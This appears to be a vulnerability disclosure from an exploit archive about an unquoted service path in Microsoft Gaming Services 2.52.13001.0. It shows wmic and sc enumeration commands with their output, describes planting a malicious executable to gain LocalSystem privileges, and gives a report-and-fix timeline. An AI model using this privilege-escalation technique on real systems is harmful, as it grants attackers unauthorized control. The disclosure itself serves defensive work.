Microsoft Gaming Services 2.52.13001.0 Unquoted Service Path

Microsoft Gaming Services version 2.52.13001.0 suffers from an unquoted service path vulnerability.


MD5 | fd3686589e68fa850eb079be7e829f6b

# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
# Discovery by: Johto Robbie
# Discovery Date: May 12, 2021
# Tested Version: 2.52.13001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 Home

# Step to discover Unquoted Service Path:

Go to Start and type cmd. Enter the following command and press Enter:

C:\Users\Bang's>wmic service get name, displayname, pathname, startmode |
findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """

Gaming Services
GamingServices C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe



Auto

Gaming Services
GamingServicesNet C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe



Auto

C:\Users\Bang's>sc qc "GamingServices"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServices

TYPE : 210 WIN32_PACKAGED_PROCESS

START_TYPE : 2 AUTO_START

ERROR_CONTROL : 0 IGNORE

BINARY_PATH_NAME : C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe

LOAD_ORDER_GROUP :

TAG : 0

DISPLAY_NAME : Gaming Services

DEPENDENCIES : staterepository

SERVICE_START_NAME : LocalSystem

This application have no quote . And it contained in C:\Program Files. Put
mot malicious aplication with name "progarm.exe"

Stop & Start: GamingServices. "progarm.exe" will be execute

#Exploit:

An unquoted service path in
Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to
privilege escalation during the installation process that is performed when
an executable file is registered. This could further lead to complete
compromise of confidentiality, Integrity and Availability.

#Timeline
May 12, 2021 - Reported to Microsoft
Feb 11, 2022 - Confirmed vulnerability has been fixed



Related Posts